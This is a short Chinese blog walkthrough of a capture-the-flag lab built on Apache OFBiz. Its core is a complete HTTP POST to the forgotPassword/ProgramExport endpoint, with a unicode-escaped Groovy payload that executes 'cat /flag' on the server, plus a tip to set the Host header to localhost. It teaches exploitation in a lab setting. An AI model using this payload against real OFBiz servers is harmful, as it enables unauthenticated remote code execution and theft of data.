1.阅读靶场介绍
我们能得到的就是目录遍历
这里我们需要稍微等待一下,博主等了五分钟才成功进入靶场的哟
2.进入靶场
得到如下的页面
这里我们需要改一下url
改为https之后再抓包
3.https哟记得哟
用https能得到一个如下图所示的界面
原地刷新抓包
4.bp启动啦,别睡觉了
抓波构造如下所示的页面
但是发现不能webshell
我们把域名host的那个8.147.xxx的换成localhost就可以了
各位彦祖们可以参考一下下面的代码哟
代码如下
POST /webtools/control/forgotPassword/ProgramExport HTTP/1.1 Host: localhost:22975 Cookie: JSESSIONID=D4CF7B3D5AB58E96A422466895B2FB63.jvm1; OFBiz.Visitor=10000 Content-Length: 310 Cache-Control: max-age=0 Sec-Ch-Ua: "Google Chrome";v="141", "Not?A_Brand";v="8", "Chromium";v="141" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Priority: u=0, i Connection: keep-alive groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0063\u0061\u0074\u0020\u002f\u0066\u006c\u0061\u0067\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b要记住就是localhost不是别的东西,不要改为自己靶场的域名哟
到这里相信各位彦祖们也夺旗啦
感谢你的观看,可以给博主点个赞支持支持哟